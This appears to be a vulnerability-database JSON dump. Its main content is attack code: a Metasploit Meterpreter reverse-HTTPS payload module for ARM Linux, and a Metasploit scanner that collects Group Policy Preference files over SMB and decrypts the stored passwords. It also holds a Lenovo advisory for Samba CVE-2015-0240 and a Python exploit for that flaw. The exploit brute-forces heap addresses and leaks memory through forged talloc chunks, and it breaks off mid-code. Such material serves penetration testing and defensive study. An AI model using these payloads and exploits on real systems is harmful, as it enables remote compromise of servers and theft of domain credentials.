{"metasploit": [{"lastseen": "2019-11-13T17:24:02", "bulletinFamily": "exploit", "description": "Run the Meterpreter / Mettle server payload (stageless)\n", "modified": "2019-05-21T17:40:27", "published": "2017-03-21T09:38:18", "id": "MSF:PAYLOAD/LINUX/ARMLE/METERPRETER_REVERSE_HTTPS", "href": "", "type": "metasploit", "title": "Linux Meterpreter, Reverse HTTPS Inline", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_https'\nrequire 'msf/base/sessions/meterpreter_options'\nrequire 'msf/base/sessions/mettle_config'\nrequire 'msf/base/sessions/meterpreter_armle_linux'\n\nmodule MetasploitModule\n\n CachedSize = 1030744\n\n include Msf::Payload::Single\n include Msf::Sessions::MeterpreterOptions\n include Msf::Sessions::MettleConfig\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline',\n 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',\n 'Author' => [\n 'Adam Cammack <adam_cammack[at]rapid7.com>',\n 'Brent Cook <brent_cook[at]rapid7.com>',\n 'timwr'\n ],\n 'Platform' => 'linux',\n 'Arch' => ARCH_ARMLE,\n 'License' => MSF_LICENSE,\n 'Handler' => Msf::Handler::ReverseHttps,\n 'Session' => Msf::Sessions::Meterpreter_armle_Linux\n )\n )\n end\n\n def generate\n opts = {\n scheme: 'https',\n stageless: true\n }\n MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', generate_config(opts)).to_binary :exec\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb"}, {"lastseen": "2019-11-23T10:17:13", "bulletinFamily": "exploit", "description": "This module enumerates files from target domain controllers and connects to them via SMB. 
It then looks for Group Policy Preference XML files containing local/domain user accounts and passwords and decrypts them using Microsofts public AES key. This module has been tested successfully on a Win2k8 R2 Domain Controller.\n", "modified": "2018-09-10T20:04:22", "published": "2015-07-28T19:21:33", "id": "MSF:AUXILIARY/SCANNER/SMB/SMB_ENUM_GPP", "href": "", "type": "metasploit", "title": "SMB Group Policy Preference Saved Passwords Enumeration", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/parser/group_policy_preferences'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SMB::Client::Authenticated\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n # Aliases for common classes\n SIMPLE = Rex::Proto::SMB::Client\n XCEPT = Rex::Proto::SMB::Exceptions\n CONST = Rex::Proto::SMB::Constants\n\n def initialize\n super(\n 'Name' => 'SMB Group Policy Preference Saved Passwords Enumeration',\n 'Description' => %Q{\n This module enumerates files from target domain controllers and connects to them via SMB.\n It then looks for Group Policy Preference XML files containing local/domain user accounts\n and passwords and decrypts them using Microsofts public AES key. This module has been\n tested successfully on a Win2k8 R2 Domain Controller.\n },\n 'Author' =>\n [\n 'Joshua D. 
Abraham <jabra[at]praetorian.com>',\n ],\n 'References' =>\n [\n ['MSB', 'MS14-025'],\n ['URL', 'http://msdn.microsoft.com/en-us/library/cc232604(v=prot.13)'],\n ['URL', 'http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html'],\n ['URL', 'http://blogs.technet.com/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx'],\n ['URL', 'https://labs.portcullis.co.uk/blog/are-you-considering-using-microsoft-group-policy-preferences-think-again/']\n ],\n 'License' => MSF_LICENSE\n )\n register_options([\n OptString.new('SMBSHARE', [true, 'The name of the share on the server', 'SYSVOL']),\n OptString.new('RPORT', [true, 'The Target port', 445]),\n OptBool.new('STORE', [true, 'Store the enumerated files in loot.', true])\n ])\n end\n\n def check_path(ip, path)\n vprint_status(\"Trying to download \\\\\\\\#{ip}\\\\#{path}...\")\n begin\n fd = simple.open(\"\\\\#{path}\", 'ro')\n fd.close\n print_good \"Found Policy Share on #{ip}\"\n smb_download(ip, path)\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e\n case e.get_error(e.error_code)\n when 'STATUS_FILE_IS_A_DIRECTORY'\n print_good(\"Directory FOUND: \\\\\\\\#{ip}\\\\#{datastore['SMBSHARE']}\\\\#{path}\")\n when 'STATUS_OBJECT_NAME_NOT_FOUND'\n vprint_error(\"Object \\\\\\\\#{ip}\\\\#{datastore['SMBSHARE']}\\\\#{path} NOT found!\")\n when 'STATUS_OBJECT_PATH_NOT_FOUND'\n vprint_error(\"Object PATH \\\\\\\\#{ip}\\\\#{datastore['SMBSHARE']}\\\\#{path} NOT found!\")\n when 'STATUS_ACCESS_DENIED'\n vprint_error(\"Host reports access denied.\")\n when 'STATUS_BAD_NETWORK_NAME'\n vprint_error(\"Host is NOT connected to #{datastore['SMBDomain']}!\")\n when 'STATUS_INSUFF_SERVER_RESOURCES'\n vprint_error(\"Host rejected with insufficient resources!\")\n when 'STATUS_OBJECT_NAME_INVALID'\n vprint_error(\"opening \\\\#{path} bad filename\")\n else\n return\n end\n end\n end\n\n def report_creds(ip, user, password)\n service_data = {\n address: ip,\n port: rport,\n protocol: 
'tcp',\n service_name: 'smb',\n workspace_id: myworkspace_id\n }\n\n new_user = user.sub(/\\s+.*/, '')\n first, rest = new_user.split(/\\\\/)\n if first && rest\n domain = first\n user = rest\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: user,\n private_data: password,\n private_type: :password,\n realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,\n realm_value: domain,\n }\n else\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: new_user,\n private_data: password,\n private_type: :password\n }\n end\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n\n def parse_xml(ip, path, xml_file)\n mxml = xml_file[:xml]\n print_status \"Parsing file: \\\\\\\\#{ip}\\\\#{datastore['SMBSHARE']}\\\\#{path}\"\n file_type = File.basename(xml_file[:path].gsub(\"\\\\\",\"/\"))\n results = Rex::Parser::GPP.parse(mxml)\n tables = Rex::Parser::GPP.create_tables(results, file_type, xml_file[:domain], xml_file[:dc])\n\n tables.each do |table|\n print_good(table.to_s)\n end\n\n results.each do |result|\n if datastore['STORE']\n stored_path = store_loot('microsoft.windows.gpp', 'text/xml', ip, xml_file[:xml], file_type, xml_file[:path])\n print_good(\"XML file saved to: #{stored_path}\")\n end\n\n report_creds(ip, result[:USER], result[:PASS])\n end\n end\n\n def smb_download(ip, path)\n vprint_status(\"Downloading #{path}...\")\n\n fd = simple.open(\"\\\\#{path}\", 'ro')\n data = fd.read\n fd.close\n\n path_elements = path.split('\\\\')\n ret_obj = {\n :dc => ip,\n :path => path,\n :xml => data\n }\n ret_obj[:domain] = path_elements[0]\n\n parse_xml(ip, path, ret_obj) if ret_obj\n\n fname = path.split(\"\\\\\")[-1]\n\n if datastore['STORE']\n path = store_loot('smb.shares.file', 'application/octet-stream', 
ip, data, fname)\n print_good(\"#{fname} saved as: #{path}\")\n end\n end\n\n def run_host(ip)\n print_status('Connecting to the server...')\n begin\n connect\n smb_login\n print_status(\"Mounting the remote share \\\\\\\\#{ip}\\\\#{datastore['SMBSHARE']}'...\")\n simple.connect(\"\\\\\\\\#{ip}\\\\#{datastore['SMBSHARE']}\")\n\n root_listing = simple.client.find_first(\"*\")\n corp_domain = ''\n root_listing.each_key do |key|\n next if key == '.' || key == '..'\n corp_domain = key\n end\n\n sub_folder_listing = simple.client.find_first(\"#{corp_domain}\\\\Policies\\\\*\")\n sub_folders = []\n sub_folder_listing.each_key do |key|\n next if key == '.' || key == '..'\n sub_folders << key\n end\n\n gpp_locations = %w(\n \\\\MACHINE\\\\Preferences\\\\Groups\\\\Groups.xml\n \\\\USER\\\\Preferences\\\\Groups\\\\Groups.xml\n \\\\MACHINE\\\\Preferences\\\\Services\\\\Services.xml\n \\\\USER\\\\Preferences\\\\Printers\\\\Printers.xml\n \\\\USER\\\\Preferences\\\\Drives\\\\Drives.xml\n \\\\MACHINE\\\\Preferences\\\\Datasources\\\\DataSources.xml\n \\\\USER\\\\Preferences\\\\Datasources\\\\DataSources.xml\n \\\\MACHINE\\\\Preferences\\\\ScheduledTasks\\\\ScheduledTasks.xml\n \\\\USER\\\\Preferences\\\\ScheduledTasks\\\\ScheduledTasks.xml\n )\n sub_folders.each do |i|\n gpp_locations.each do |gpp_l|\n check_path(ip,\"#{corp_domain}\\\\Policies\\\\#{i}#{gpp_l}\")\n end\n end\n rescue ::Exception => e\n print_error(\"#{rhost}: #{e.class} #{e}\")\n ensure\n disconnect\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/smb/smb_enum_gpp.rb"}], "lenovo": [{"lastseen": "2018-02-21T17:01:59", "bulletinFamily": "info", "description": "**Lenovo Security Advisory:** LEN-2015-016 \n**Potential Impact:** Execution of arbitrary code \n****Severity****: High \n \n**Summary:** Samba is an open-source implementation of the Server Message Block (SMB) or Common Internet File System 
(CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information. An uninitialized pointer use flaw was found in the Samba daemon (smbd). A malicious Samba client could send specially crafted netlogon packets that could potentially lead to arbitrary code execution with the privileges of the user running smbd. \n \nSamba is utilized by Lifeline firmware which ships on LenovoEMC network storage devices. Refer to Product Impact for information about remediation. \n \n**Product Impact:**\n\n**Affected Product ** | **Lifeline minimum version including fix** | **Link ** \n---|---|--- \n \nLenovoEMC px12-400r\n\n| 4.1.110.33149 ** ** | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/32028> \n \nLenovoEMC EZ Media & Backup (hm3)\n\n| 4.1.110.33149 ** ** | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/32028> \n \nLenovoEMC ix2 (inc DL)\n\n| 4.1.110.33149** ** | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/31178> \n \nLenovoEMC ix4-300d (inc DL)\n\n| 4.1.110.33149** ** | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/32094> \n \nLenovoEMC px2-300d (inc NVR)\n\n| 4.1.110.33149** ** | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/32094> \n \nLenovoEMC px4-300d (inc NVR)\n\n| 4.1.110.33149 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/27363> \n \nLenovoEMC px4-300r\n\n| 4.1.110.33149 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/27368> \n \nLenovoEMC px4-400d\n\n| 4.1.110.33149 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/33814> \n \nLenovoEMC px4-400d NVR\n\n| 4.1.110.33149 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/33814> \n \nLenovoEMC px4-400r\n\n| 4.1.110.33149 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/33824> \n \nLenovoEMC px6-300d\n\n| 4.1.110.33149 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/27366> \n \nLenovoEMC px12-400r\n\n| 4.1.110.33149 
| \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/32092> \n \nLenovoEMC px12-450r\n\n| 4.1.110.33149 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/32092> \n \nLenovoEMC ix12-300r\n\n| 4.0.18.33013 | \n\n<https://lenovo-na-en.custhelp.com/app/answers/detail/a_id/23142> \n \nLenovoEMC px12-350r\n\n| 4.0.18.33013 | \n\n<https://lenovo-na-en.custhelp.com/app/answers/detail/a_id/23142> \n \nLenovoEMC Home Media Cloud Edition (hm2)\n\n| 3.2.12.30116 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/26784> \n \nLenovoEMC ix2-200 Cloud Edition\n\n| 3.2.12.30116 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/26784> \n \nLenovoEMC ix4-200d Cloud Edition\n\n| 3.2.12.30116 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/26784> \n \n \n**Acknowledgements: **None \n**Other information and references:**\n\n * <https://www.us-cert.gov/ncas/current-activity/2015/02/24/Samba-Remote-Code-Execution-Vulnerability>\n * CVE ID: [CVE-2015-0240](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0240>)\n**Revision History:**\n\n****Revision****\n\n| \n\n****Date****\n\n| \n\n****Description**** \n \n---|---|--- \n** 1.1** | ** 6 Jun 2015** | ** Published additional fixes** \n** 1.0** | ** 3 Apr 2015** | ** Initial release**\n", "modified": "2017-01-23T00:00:00", "published": "2017-01-23T00:00:00", "id": "LENOVO:PS500014-NOSID", "href": "https://support.lenovo.com/us/en/product_security/samba_remote_vuln", "type": "lenovo", "title": "Samba Remote Code Execution Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T12:25:55", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2015-11-13T00:00:00", "published": "2015-11-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-89724", "id": "SSV:89724", "type": "seebug", "title": "Samba 
NetLogon\u672a\u521d\u59cb\u5316\u6307\u9488\u6f0f\u6d1e\uff08CVE-2015-0240\uff09", "sourceData": "\n #!/usr/bin/env python\r\n# coding: utf-8\r\nimport sys\r\nimport time\r\nfrom struct import pack,unpack\r\nimport argparse\r\n \r\nimport impacket\r\nfrom impacket.dcerpc.v5 import transport, nrpc\r\nfrom impacket.dcerpc.v5.ndr import NDRCALL\r\nfrom impacket.dcerpc.v5.dtypes import WSTR\r\n \r\n \r\nclass Requester:\r\n \"\"\"\r\n put all smb request stuff into class. help my editor folding them\r\n \"\"\"\r\n \r\n # impacket does not implement NetrServerPasswordSet\r\n # 3.5.4.4.6 NetrServerPasswordSet (Opnum 6)\r\n class NetrServerPasswordSet(NDRCALL):\r\n opnum = 6\r\n structure = (\r\n ('PrimaryName',nrpc.PLOGONSRV_HANDLE),\r\n ('AccountName',WSTR),\r\n ('SecureChannelType',nrpc.NETLOGON_SECURE_CHANNEL_TYPE),\r\n ('ComputerName',WSTR),\r\n ('Authenticator',nrpc.NETLOGON_AUTHENTICATOR),\r\n ('UasNewPassword',nrpc.ENCRYPTED_NT_OWF_PASSWORD),\r\n )\r\n # response is authenticator (8 bytes) and error code (4 bytes)\r\n \r\n # size of each field in sent packet\r\n req_server_handle_size = 16\r\n req_username_hdr_size = 4 + 4 + 4 + 2 # max count, offset, actual count, trailing null\r\n req_sec_type_size = 2\r\n req_computer_size = 4 + 4 + 4 + 2\r\n req_authenticator_size = 8 + 2 + 4\r\n req_new_pwd_size = 16\r\n req_presize = req_server_handle_size + req_username_hdr_size + req_sec_type_size + req_computer_size + req_authenticator_size + req_new_pwd_size\r\n \r\n samba_rpc_fragment_size = 4280\r\n netlogon_data_fragment_size = samba_rpc_fragment_size - 8 - 24 # 24 is dcerpc header size\r\n \r\n def __init__(self):\r\n self.target = None\r\n self.dce = None\r\n \r\n sessionKey = '\\x00'*16\r\n # prepare ServerPasswordSet request\r\n authenticator = nrpc.NETLOGON_AUTHENTICATOR()\r\n authenticator['Credential'] = nrpc.ComputeNetlogonCredential('12345678', sessionKey)\r\n authenticator['Timestamp'] = 10\r\n \r\n uasNewPass = nrpc.ENCRYPTED_NT_OWF_PASSWORD()\r\n 
uasNewPass['Data'] = '\\x00'*16\r\n \r\n self.serverName = nrpc.PLOGONSRV_HANDLE()\r\n # ReferentID field of PrimaryName controls the uninitialized value of creds\r\n self.serverName.fields['ReferentID'] = 0\r\n \r\n self.accountName = WSTR()\r\n \r\n request = Requester.NetrServerPasswordSet()\r\n request['PrimaryName'] = self.serverName\r\n request['AccountName'] = self.accountName\r\n request['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel\r\n request['ComputerName'] = '\\x00'\r\n request['Authenticator'] = authenticator\r\n request['UasNewPassword'] = uasNewPass\r\n self.request = request\r\n \r\n def set_target(self, target):\r\n self.target = target\r\n \r\n def set_payload(self, s, pad_to_size=0):\r\n if pad_to_size > 0:\r\n s += '\\x00'*(pad_to_size-len(s))\r\n pad_size = 0\r\n if len(s) < (16*1024+1):\r\n ofsize = (len(s)+self.req_presize) % self.netlogon_data_fragment_size\r\n if ofsize > 0:\r\n pad_size = self.netlogon_data_fragment_size - ofsize\r\n \r\n self.accountName.fields['Data'] = s+'\\x00'*pad_size+'\\x00\\x00'\r\n self.accountName.fields['MaximumCount'] = None\r\n self.accountName.fields['ActualCount'] = None\r\n self.accountName.data = None # force recompute\r\n \r\n set_accountNameData = set_payload\r\n \r\n def get_dce(self):\r\n if self.dce is None or self.dce.lostconn:\r\n rpctransport = transport.DCERPCTransportFactory(r'ncacn_np:%s[\\PIPE\\netlogon]' % self.target)\r\n rpctransport.set_credentials('','') # NULL session\r\n rpctransport.set_dport(445)\r\n # force to 'NT LM 0.12' only\r\n rpctransport.preferred_dialect('NT LM 0.12')\r\n \r\n self.dce = rpctransport.get_dce_rpc()\r\n self.dce.connect()\r\n self.dce.bind(nrpc.MSRPC_UUID_NRPC)\r\n self.dce.lostconn = False\r\n return self.dce\r\n \r\n def get_socket(self):\r\n return self.dce.get_rpc_transport().get_socket()\r\n \r\n def force_dce_disconnect(self):\r\n if not (self.dce is None or self.dce.lostconn):\r\n self.get_socket().close()\r\n 
self.dce.lostconn = True\r\n \r\n def request_addr(self, addr):\r\n self.serverName.fields['ReferentID'] = addr\r\n \r\n dce = self.get_dce()\r\n try:\r\n dce.call(self.request.opnum, self.request)\r\n answer = dce.recv()\r\n return unpack(\"<IIII\", answer)\r\n except impacket.nmb.NetBIOSError as e:\r\n if e.args[0] != 'Error while reading from remote':\r\n raise\r\n dce.lostconn = True\r\n return None\r\n \r\n # call with no read\r\n def call_addr(self, addr):\r\n self.serverName.fields['ReferentID'] = addr\r\n \r\n dce = self.get_dce()\r\n try:\r\n dce.call(self.request.opnum, self.request)\r\n return True\r\n except impacket.nmb.NetBIOSError as e:\r\n if e.args[0] != 'Error while reading from remote':\r\n raise\r\n dce.lostconn = True\r\n return False\r\n \r\n def force_recv(self):\r\n dce = self.get_dce()\r\n return dce.get_rpc_transport().recv(forceRecv=True)\r\n \r\n def request_check_valid_addr(self, addr):\r\n answers = self.request_addr(addr)\r\n if answers is None:\r\n return False # connection lost\r\n elif answers[3] != 0:\r\n return True # error, expected\r\n else:\r\n raise Error('Unexpected result')\r\n \r\n \r\n# talloc constants\r\nTALLOC_MAGIC = 0xe8150c70 # for talloc 2.0\r\nTALLOC_FLAG_FREE = 0x01\r\nTALLOC_FLAG_LOOP = 0x02\r\nTALLOC_FLAG_POOL = 0x04\r\nTALLOC_FLAG_POOLMEM = 0x08\r\n \r\nTALLOC_HDR_SIZE = 0x30 # for 32 bit\r\n \r\nflag_loop = TALLOC_MAGIC | TALLOC_FLAG_LOOP # for checking valid address\r\n \r\n# Note: do NOT reduce target_payload_size less than 8KB. 4KB is too small buffer. 
cannot predict address.\r\nTARGET_PAYLOAD_SIZE = 8192\r\n \r\n########\r\n# request helper functions\r\n########\r\n \r\n# only one global requester\r\nrequester = Requester()\r\n \r\ndef force_dce_disconnect():\r\n requester.force_dce_disconnect()\r\n \r\ndef request_addr(addr):\r\n return requester.request_addr(addr)\r\n \r\ndef request_check_valid_addr(addr):\r\n return requester.request_check_valid_addr(addr)\r\n \r\ndef set_payload(s, pad_to_size=0):\r\n requester.set_payload(s, pad_to_size)\r\n \r\ndef get_socket():\r\n return requester.get_socket()\r\n \r\ndef call_addr(addr):\r\n return requester.call_addr(addr)\r\n \r\ndef force_recv():\r\n return requester.force_recv()\r\n \r\n########\r\n# find heap address\r\n########\r\n \r\n# only refs MUST be NULL, other never be checked\r\nfake_chunk_find_heap = pack(\"<IIIIIIII\",\r\n 0, 0, 0, 0, # refs\r\n flag_loop, flag_loop, flag_loop, flag_loop,\r\n)\r\n \r\ndef find_valid_heap_addr(start_addr, stop_addr, payload_size, first=False):\r\n \"\"\"\r\n below code can be used for checking valid heap address (no crash)\r\n \r\n if (unlikely(tc->flags & TALLOC_FLAG_LOOP)) {\r\n /* we have a free loop - stop looping */\r\n return 0;\r\n }\r\n \"\"\"\r\n global fake_chunk_find_heap\r\n payload = fake_chunk_find_heap*(payload_size/len(fake_chunk_find_heap))\r\n set_payload(payload)\r\n addr_step = payload_size\r\n addr = start_addr\r\n i = 0\r\n while addr > stop_addr:\r\n if i == 16:\r\n print(\" [*]trying addr: {:x}\".format(addr))\r\n i = 0\r\n \r\n if request_check_valid_addr(addr):\r\n return addr\r\n if first:\r\n # first time, the last 16 bit is still do not know\r\n # have to do extra check\r\n if request_check_valid_addr(addr+0x10):\r\n return addr+0x10\r\n addr -= addr_step\r\n i += 1\r\n return None\r\n \r\ndef find_valid_heap_exact_addr(addr, payload_size):\r\n global fake_chunk_find_heap\r\n fake_size = payload_size // 2\r\n while fake_size >= len(fake_chunk_find_heap):\r\n payload = 
fake_chunk_find_heap*(fake_size/len(fake_chunk_find_heap))\r\n set_payload(payload, payload_size)\r\n if not request_check_valid_addr(addr):\r\n addr -= fake_size\r\n fake_size = fake_size // 2\r\n \r\n set_payload('\\x00'*16 + pack(\"<I\", flag_loop), payload_size)\r\n # because glibc heap is align by 8\r\n # so the last 4 bit of address must be 0x4 or 0xc\r\n if request_check_valid_addr(addr-4):\r\n addr -= 4\r\n elif request_check_valid_addr(addr-0xc):\r\n addr -= 0xc\r\n else:\r\n print(\" [-] bad exact addr: {:x}\".format(addr))\r\n return 0\r\n \r\n print(\" [*] checking exact addr: {:x}\".format(addr))\r\n \r\n if (addr & 4) == 0:\r\n return 0\r\n \r\n # test the address\r\n \r\n # must be invalid (refs is AccountName.ActualCount)\r\n set_payload('\\x00'*12 + pack(\"<I\", flag_loop), payload_size)\r\n if request_check_valid_addr(addr-4):\r\n print(' [-] request_check_valid_addr(addr-4) failed')\r\n return 0\r\n # must be valid (refs is AccountName.Offset)\r\n # do check again if fail. sometimes heap layout is changed\r\n set_payload('\\x00'*8 + pack(\"<I\", flag_loop), payload_size)\r\n if not request_check_valid_addr(addr-8) and not request_check_valid_addr(addr-8) :\r\n print(' [-] request_check_valid_addr(addr-8) failed')\r\n return 0\r\n # must be invalid (refs is AccountName.MaxCount)\r\n set_payload('\\x00'*4 + pack(\"<I\", flag_loop), payload_size)\r\n if request_check_valid_addr(addr-0xc):\r\n print(' [-] request_check_valid_addr(addr-0xc) failed')\r\n return 0\r\n # must be valid (refs is ServerHandle.ActualCount)\r\n # do check again if fail. 
sometimes heap layout is changed\r\n set_payload(pack(\"<I\", flag_loop), payload_size)\r\n if not request_check_valid_addr(addr-0x10) and not request_check_valid_addr(addr-0x10):\r\n print(' [-] request_check_valid_addr(addr-0x10) failed')\r\n return 0\r\n \r\n return addr\r\n \r\ndef find_payload_addr(start_addr, start_payload_size, target_payload_size):\r\n print('[*] bruteforcing heap address...')\r\n \r\n start_addr = start_addr & 0xffff0000\r\n \r\n heap_addr = 0\r\n while heap_addr == 0:\r\n # loop from max to 0xb7700000 for finding heap area\r\n # offset 0x20000 is minimum offset from heap start to recieved data in heap\r\n stop_addr = 0xb7700000 + 0x20000\r\n good_addr = None\r\n payload_size = start_payload_size\r\n while payload_size >= target_payload_size:\r\n force_dce_disconnect()\r\n found_addr = None\r\n for i in range(3):\r\n found_addr = find_valid_heap_addr(start_addr, stop_addr, payload_size, good_addr is None)\r\n if found_addr is not None:\r\n break\r\n if found_addr is None:\r\n # failed\r\n good_addr = None\r\n break\r\n good_addr = found_addr\r\n print(\" [*] found valid addr ({:d}KB): {:x}\".format(payload_size//1024, good_addr))\r\n start_addr = good_addr\r\n stop_addr = good_addr - payload_size + 0x20\r\n payload_size //= 2\r\n \r\n if good_addr is not None:\r\n # try 3 times to find exact address. if address cannot be found, assume\r\n # minimizing payload size is not correct. 
start minimizing again\r\n for i in range(3):\r\n heap_addr = find_valid_heap_exact_addr(good_addr, target_payload_size)\r\n if heap_addr != 0:\r\n break\r\n force_dce_disconnect()\r\n \r\n if heap_addr == 0:\r\n print(' [-] failed to find payload adress')\r\n # start from last good address + some offset\r\n start_addr = (good_addr + 0x10000) & 0xffff0000\r\n print('[*] bruteforcing heap adress again from {:x}'.format(start_addr))\r\n \r\n payload_addr = heap_addr - len(fake_chunk_find_heap)\r\n print(\" [+] found payload addr: {:x}\".format(payload_addr))\r\n return payload_addr\r\n \r\n \r\n########\r\n# leak info\r\n########\r\n \r\ndef addr2utf_prefix(addr):\r\n def is_badchar(v):\r\n return (v >= 0xd8) and (v <= 0xdf)\r\n \r\n prefix = 0 # safe\r\n if is_badchar((addr)&0xff) or is_badchar((addr>>16)&0xff):\r\n prefix |= 2 # cannot have prefix\r\n if is_badchar((addr>>8)&0xff) or is_badchar((addr>>24)&0xff):\r\n prefix |= 1 # must have prefix\r\n return prefix\r\n \r\ndef leak_info_unlink(payload_addr, next_addr, prev_addr, retry=True, call_only=False):\r\n \"\"\"\r\n Note:\r\n - if next_addr and prev_addr are not zero, they must be writable address\r\n because of below code in _talloc_free_internal()\r\n if (tc->prev) tc->prev->next = tc->next;\r\n if (tc->next) tc->next->prev = tc->prev;\r\n \"\"\"\r\n # Note: U+D800 to U+DFFF is reserved (also bad char for samba)\r\n # check if '\\x00' is needed to avoid utf16 badchar\r\n prefix_len = addr2utf_prefix(next_addr) | addr2utf_prefix(prev_addr)\r\n if prefix_len == 3:\r\n return None # cannot avoid badchar\r\n if prefix_len == 2:\r\n prefix_len = 0\r\n \r\n fake_chunk_leak_info = pack(\"<IIIIIIIIIIII\",\r\n next_addr, prev_addr, # next, prev\r\n 0, 0, # parent, children\r\n 0, 0, # refs, destructor\r\n 0, 0, # name, size\r\n TALLOC_MAGIC | TALLOC_FLAG_POOL, # flag\r\n 0, 0, 0, # pool, pad, pad\r\n )\r\n payload = '\\x00'*prefix_len+fake_chunk_leak_info + pack(\"<I\", 0x80000) # pool_object_count\r\n 
set_payload(payload, TARGET_PAYLOAD_SIZE)\r\n if call_only:\r\n return call_addr(payload_addr + TALLOC_HDR_SIZE + prefix_len)\r\n \r\n for i in range(3 if retry else 1):\r\n try:\r\n answers = request_addr(payload_addr + TALLOC_HDR_SIZE + prefix_len)\r\n except impacket.dcerpc.v5.rpcrt.Exception:\r\n print(\"impacket.dcerpc.v5.rpcrt.Exception\")\r\n answers = None\r\n force_dce_disconnect()\r\n if answers is not None:\r\n # leak info must have next or prev address\r\n if (answers[1] == prev_addr) or (answers[0] == next_addr):\r\n break\r\n #print('{:x}, {:x}, {:x}, {:x}'.format(answers[0], answers[1], answers[2], answers[3]))\r\n answers = None # no next or prev in answers => wrong answer\r\n force_dce_disconnect() # heap is corrupted, disconnect it\r\n \r\n return answers\r\n \r\ndef leak_info_addr(payload_addr, r_out_addr, leak_addr, retry=True):\r\n # leak by replace r->out.return_authenticator pointer\r\n # Note: because leak_addr[4:8] will be replaced with r_out_addr\r\n # only answers[0] and answers[2] are leaked\r\n return leak_info_unlink(payload_addr, leak_addr, r_out_addr, retry)\r\n \r\ndef leak_info_addr2(payload_addr, r_out_addr, leak_addr, retry=True):\r\n # leak by replace r->out.return_authenticator pointer\r\n # Note: leak_addr[0:4] will be replaced with r_out_addr\r\n # only answers[1] and answers[2] are leaked\r\n return leak_info_unlink(payload_addr, r_out_addr-4, leak_addr-4, retry)\r\n \r\ndef leak_uint8t_addr(payload_addr, r_out_addr, chunk_addr):\r\n # leak name field ('uint8_t') in found heap chunk\r\n # do not retry this leak, because r_out_addr is guessed\r\n answers = leak_info_addr(payload_addr, r_out_addr, chunk_addr + 0x18, False)\r\n if answers is None:\r\n return None\r\n if answers[2] != TALLOC_MAGIC:\r\n force_dce_disconnect()\r\n return None\r\n \r\n return answers[0]\r\n \r\ndef leak_info_find_offset(info):\r\n # offset from pool to payload still does not know\r\n print(\"[*] guessing 'r' offset and leaking 'uint8_t' address 
...\")\r\n chunk_addr = info['chunk_addr']\r\n uint8t_addr = None\r\n r_addr = None\r\n r_out_addr = None\r\n while uint8t_addr is None:\r\n # 0x8c10 <= 4 + 0x7f88 + 0x2044 - 0x13c0\r\n # 0x9ce0 <= 4 + 0x7f88 + 0x10d0 + 0x2044 - 0x13c0\r\n # 0xadc8 <= 4 + 0x7f88 + 0x10e8 + 0x10d0 + 0x2044 - 0x13c0\r\n # 0xad40 is extra offset when no share on debian\r\n # 0x10d38 is extra offset when only [printers] is shared on debian\r\n for offset in (0x8c10, 0x9ce0, 0xadc8, 0xad40, 0x10d38):\r\n r_addr = chunk_addr - offset\r\n # 0x18 is out.authenticator offset\r\n r_out_addr = r_addr + 0x18\r\n print(\" [*] try 'r' offset 0x{:x}, r_out addr: 0x{:x}\".format(offset, r_out_addr))\r\n \r\n uint8t_addr = leak_uint8t_addr(info['payload_addr'], r_out_addr, chunk_addr)\r\n if uint8t_addr is not None:\r\n print(\" [*] success\")\r\n break\r\n print(\" [-] failed\")\r\n if uint8t_addr is None:\r\n return False\r\n \r\n info['uint8t_addr'] = uint8t_addr\r\n info['r_addr'] = r_addr\r\n info['r_out_addr'] = r_out_addr\r\n info['pool_addr'] = r_addr - 0x13c0\r\n \r\n print(\" [+] 